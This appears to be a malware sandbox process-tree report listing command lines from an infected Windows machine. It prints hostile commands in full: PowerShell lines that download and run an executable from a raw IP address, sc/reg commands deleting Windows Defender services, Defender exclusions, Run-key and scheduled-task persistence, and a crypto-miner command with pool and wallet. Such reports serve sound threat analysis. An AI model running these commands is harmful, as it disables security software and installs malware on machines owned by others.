C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5480,i,16614654389191183617,15757931735466384284,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5168 /prefetch:88⤵PID:232
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:13012 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x260,0x7ff97a4df208,0x7ff97a4df214,0x7ff97a4df2208⤵PID:13692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1928,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=1924 /prefetch:28⤵PID:13984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2224,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:38⤵PID:13996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1936,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:88⤵PID:14200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3580,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=3664 /prefetch:18⤵
- Uses browser remote debugging
PID:6412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3576,i,17493490287960500773,2724308708713489240,262144 --variations-seed-version --mojo-platform-channel-handle=3620 /prefetch:18⤵
- Uses browser remote debugging
PID:6420
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\d2dbi" & exit7⤵
- System Location Discovery: System Language Discovery
PID:10728 -
C:\Windows\SysWOW64\timeout.exetimeout /t 118⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:10884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
PID:1136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
PID:4624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
PID:5724

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4584

C:\Users\Admin\AppData\Local\Temp\10297860101\y0u3d_003.exe
"C:\Users\Admin\AppData\Local\Temp\10297860101\y0u3d_003.exe" 6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:672

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:' 7⤵
PID:832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath 'C:' 8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe" 7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:804

C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" "" 8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Remove-MpPreference -ExclusionPath C:\ 9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6840

C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" "" 8⤵
- Deletes itself
- Executes dropped EXE
PID:1088

C:\Users\Admin\AppData\Local\Temp\{99e2948d-c006-4262-bf92-4d4b77e0d141}\3ff3734d.exe
"C:\Users\Admin\AppData\Local\Temp\{99e2948d-c006-4262-bf92-4d4b77e0d141}\3ff3734d.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot 9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:11192

C:\Users\Admin\AppData\Local\Temp\{05af628d-7e82-459c-857b-141ba889bda8}\d91c7611.exe
C:/Users/Admin/AppData/Local/Temp/{05af628d-7e82-459c-857b-141ba889bda8}/\d91c7611.exe -accepteula -adinsilent -silent -processlevel 2 -postboot 10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Checks for any installed AV software in registry
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:12132
C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe
"C:\Users\Admin\AppData\Local\Temp\10298350101\tK0oYx3.exe" 6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
PID:2080

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4688

C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe
"C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe" 6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7824

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe" 7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7968

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21DB.tmp\21DC.tmp\21DD.bat C:\Users\Admin\AppData\Local\Temp\11.exe" 8⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe" go 9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3356

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2277.tmp\2278.tmp\2279.bat C:\Users\Admin\AppData\Local\Temp\11.exe go" 10⤵
- Drops file in Program Files directory
PID:2844

C:\Windows\system32\sc.exe
sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys" 11⤵
- Launches sc.exe
PID:8376

C:\Windows\system32\sc.exe
sc start ddrver 11⤵
- Launches sc.exe
PID:4764

C:\Windows\system32\timeout.exe
timeout /t 1 11⤵
- Delays execution with timeout.exe
PID:8428

C:\Windows\system32\sc.exe
sc stop ddrver 11⤵
- Launches sc.exe
PID:8460

C:\Windows\system32\sc.exe
sc start ddrver 11⤵
- Launches sc.exe
PID:8504

C:\Windows\system32\takeown.exe
takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y 11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4688

C:\Windows\system32\icacls.exe
icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t 11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4904

C:\Windows\system32\sc.exe
sc stop "WinDefend" 11⤵
- Launches sc.exe
PID:8596

C:\Windows\system32\sc.exe
sc delete "WinDefend" 11⤵
- Launches sc.exe
PID:4216

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f 11⤵
PID:8660

C:\Windows\system32\sc.exe
sc stop "MDCoreSvc" 11⤵
- Launches sc.exe
PID:4768

C:\Windows\system32\sc.exe
sc delete "MDCoreSvc" 11⤵
- Launches sc.exe
PID:8712

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f 11⤵
PID:8748

C:\Windows\system32\sc.exe
sc stop "WdNisSvc" 11⤵
- Launches sc.exe
PID:8784

C:\Windows\system32\sc.exe
sc delete "WdNisSvc" 11⤵
- Launches sc.exe
PID:8820

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f 11⤵
PID:8852

C:\Windows\system32\sc.exe
sc stop "Sense" 11⤵
- Launches sc.exe
PID:1176

C:\Windows\system32\sc.exe
sc delete "Sense" 11⤵
- Launches sc.exe
PID:8944

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\Sense" /f 11⤵
PID:8984

C:\Windows\system32\sc.exe
sc stop "wscsvc" 11⤵
- Launches sc.exe
PID:9040

C:\Windows\system32\sc.exe
sc delete "wscsvc" 11⤵
- Launches sc.exe
PID:9084

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f 11⤵
- Modifies security service
PID:9116

C:\Windows\system32\sc.exe
sc stop "SgrmBroker" 11⤵
- Launches sc.exe
PID:9168

C:\Windows\system32\sc.exe
sc delete "SgrmBroker" 11⤵
- Launches sc.exe
PID:9188

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f 11⤵
PID:4844

C:\Windows\system32\sc.exe
sc stop "SecurityHealthService" 11⤵
- Launches sc.exe
PID:824

C:\Windows\system32\sc.exe
sc delete "SecurityHealthService" 11⤵
- Launches sc.exe
PID:9256

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f 11⤵
PID:9300

C:\Windows\system32\sc.exe
sc stop "webthreatdefsvc" 11⤵
- Launches sc.exe
PID:9332

C:\Windows\system32\sc.exe
sc delete "webthreatdefsvc" 11⤵
- Launches sc.exe
PID:9376

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f 11⤵
PID:9392

C:\Windows\system32\sc.exe
sc stop "webthreatdefusersvc" 11⤵
- Launches sc.exe
PID:9424

C:\Windows\system32\sc.exe
sc delete "webthreatdefusersvc" 11⤵
- Launches sc.exe
PID:9456

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f 11⤵
PID:9508

C:\Windows\system32\sc.exe
sc stop "WdNisDrv" 11⤵
- Launches sc.exe
PID:9540

C:\Windows\system32\sc.exe
sc delete "WdNisDrv" 11⤵
- Launches sc.exe
PID:9568

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f 11⤵
PID:9616

C:\Windows\system32\sc.exe
sc stop "WdBoot" 11⤵
- Launches sc.exe
PID:9684

C:\Windows\system32\sc.exe
sc delete "WdBoot" 11⤵
- Launches sc.exe
PID:9708

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f 11⤵
PID:9748

C:\Windows\system32\sc.exe
sc stop "WdFilter" 11⤵
- Launches sc.exe
PID:9792

C:\Windows\system32\sc.exe
sc delete "WdFilter" 11⤵
- Launches sc.exe
PID:9816

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f 11⤵
PID:9868

C:\Windows\system32\sc.exe
sc stop "SgrmAgent" 11⤵
- Launches sc.exe
PID:9900

C:\Windows\system32\sc.exe
sc delete "SgrmAgent" 11⤵
- Launches sc.exe
PID:9932

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f 11⤵
PID:9972

C:\Windows\system32\sc.exe
sc stop "MsSecWfp" 11⤵
- Launches sc.exe
PID:10000

C:\Windows\system32\sc.exe
sc delete "MsSecWfp" 11⤵
- Launches sc.exe
PID:10036

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f 11⤵
PID:10092

C:\Windows\system32\sc.exe
sc stop "MsSecFlt" 11⤵
- Launches sc.exe
PID:10132

C:\Windows\system32\sc.exe
sc delete "MsSecFlt" 11⤵
- Launches sc.exe
PID:10200

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f 11⤵
PID:10232

C:\Windows\system32\sc.exe
sc stop "MsSecCore" 11⤵
- Launches sc.exe
PID:5988

C:\Windows\system32\sc.exe
sc delete "MsSecCore" 11⤵
- Launches sc.exe
PID:1944

C:\Windows\system32\reg.exe
reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f 11⤵
PID:10268

C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f 11⤵
PID:10320

C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f 11⤵
PID:10376

C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f 11⤵
PID:10440

C:\Windows\system32\schtasks.exe
schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f 11⤵
PID:10496

C:\Windows\system32\sc.exe
sc stop ddrver 11⤵
- Launches sc.exe
PID:4316

C:\Windows\system32\sc.exe
sc delete ddrver 11⤵
- Launches sc.exe
PID:10572
C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe
"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe" 6⤵
- Executes dropped EXE
PID:9624

C:\Windows\system32\reg.exe
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s 7⤵
- Modifies registry key
PID:9220

C:\Windows\system32\reg.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 470" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe\" /f 7⤵
- Adds Run key to start application
- Modifies registry key
PID:9076

C:\Windows\system32\reg.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 470" /t REG_BINARY /d 020000000000000000000000 /f 7⤵
- Modifies registry key
PID:8832

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 470" /t REG_DWORD /d 1 /f 7⤵
- Modifies registry key
PID:4760

C:\Users\Admin\AppData\Local\Temp\10318740101\32ae679328.exe
"C:\Users\Admin\AppData\Local\Temp\10318740101\32ae679328.exe" 6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn eB0mnmaUjTX /tr "mshta C:\Users\Admin\AppData\Local\Temp\WRRVcfKnF.hta" /sc minute /mo 25 /ru "Admin" /f 7⤵
- System Location Discovery: System Language Discovery
PID:5936

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn eB0mnmaUjTX /tr "mshta C:\Users\Admin\AppData\Local\Temp\WRRVcfKnF.hta" /sc minute /mo 25 /ru "Admin" /f 8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:7184

C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\WRRVcfKnF.hta 7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; 8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7312

C:\Users\Admin\AppData\Local\TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE
"C:\Users\Admin\AppData\Local\TempW3MPWS1T8QU4XD2AUQE6WEYF2G1DT1ND.EXE" 9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10318750121\am_no.cmd" " 6⤵
- System Location Discovery: System Language Discovery
PID:1704

C:\Windows\SysWOW64\timeout.exe
timeout /t 2 7⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" 7⤵
- System Location Discovery: System Language Discovery
PID:8240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" 8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" 7⤵
- System Location Discovery: System Language Discovery
PID:8676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" 8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" 7⤵
- System Location Discovery: System Language Discovery
PID:8996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" 8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9028

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "hJczxmaRANm" /tr "mshta \"C:\Temp\QjkFubwOG.hta\"" /sc minute /mo 25 /ru "Admin" /f 7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:9312

C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\QjkFubwOG.hta" 7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:9344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; 8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9460

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe" 9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:9880
C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe
"C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe" 6⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:10460

C:\Windows\system32\tasklist.exe
tasklist 7⤵
- Enumerates processes with tasklist
PID:10548

C:\Users\Admin\AppData\Roaming\winhost\winhost.exe
C:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=20 7⤵
PID:10844

C:\Windows\system32\tasklist.exe
tasklist 7⤵
- Enumerates processes with tasklist
PID:10824

C:\Windows\system32\tasklist.exe
tasklist 7⤵
- Enumerates processes with tasklist
PID:10936

C:\Windows\system32\taskkill.exe
taskkill /F /IM winhost.exe 7⤵
- Kills process with taskkill
PID:12648

C:\Users\Admin\AppData\Roaming\winhost\winhost.exe
C:\Users\Admin\AppData\Roaming\winhost\winhost.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=80 7⤵
PID:12756

C:\Windows\system32\tasklist.exe
tasklist 7⤵
- Enumerates processes with tasklist
PID:13644

C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe
"C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe" 6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:10824

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:' 7⤵
PID:10904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-MpPreference -ExclusionPath 'C:' 8⤵
- Command and Scripting Interpreter: PowerShell
PID:11152

C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe" 7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:10964

C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" "" 8⤵
PID:11716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Remove-MpPreference -ExclusionPath C:\ 9⤵
PID:11600

C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" "" 8⤵
PID:11748

C:\Users\Admin\AppData\Local\Temp\{abd13f11-c9c9-42a6-8e0e-0fb97fe19388}\60de7449.exe
"C:\Users\Admin\AppData\Local\Temp\{abd13f11-c9c9-42a6-8e0e-0fb97fe19388}\60de7449.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot 9⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\{14239a62-23d0-482c-9baf-f89af992096b}\2d6e17ce.exe
C:/Users/Admin/AppData/Local/Temp/{14239a62-23d0-482c-9baf-f89af992096b}/\2d6e17ce.exe -accepteula -adinsilent -silent -processlevel 2 -postboot 10⤵
PID:4316

C:\Users\Admin\AppData\Local\Temp\10318990101\d14d403b89.exe
"C:\Users\Admin\AppData\Local\Temp\10318990101\d14d403b89.exe" 6⤵
PID:10532

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
PID:10928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" 7⤵
PID:11000

C:\Users\Admin\AppData\Local\Temp\10319000101\2e71cd1e91.exe
"C:\Users\Admin\AppData\Local\Temp\10319000101\2e71cd1e91.exe" 6⤵
PID:12168

C:\Users\Admin\AppData\Local\Temp\10319010101\b75cac8325.exe
"C:\Users\Admin\AppData\Local\Temp\10319010101\b75cac8325.exe" 6⤵
PID:1916

C:\Users\Admin\AppData\Local\Temp\10319020101\dc52c17509.exe
"C:\Users\Admin\AppData\Local\Temp\10319020101\dc52c17509.exe" 6⤵
PID:6748

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T 7⤵
- Kills process with taskkill
PID:14040

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T 7⤵
- Kills process with taskkill
PID:13924

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T 7⤵
- Kills process with taskkill
PID:13864

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T 7⤵
- Kills process with taskkill
PID:3156

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T 7⤵
- Kills process with taskkill
PID:3356

C:\Users\Admin\AppData\Local\Temp\10319030101\0d382baa50.exe
"C:\Users\Admin\AppData\Local\Temp\10319030101\0d382baa50.exe" 6⤵
PID:7160

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe" 1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc 1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1836 -ip 1836 1⤵
PID:2232

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe" 1⤵
PID:14080

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
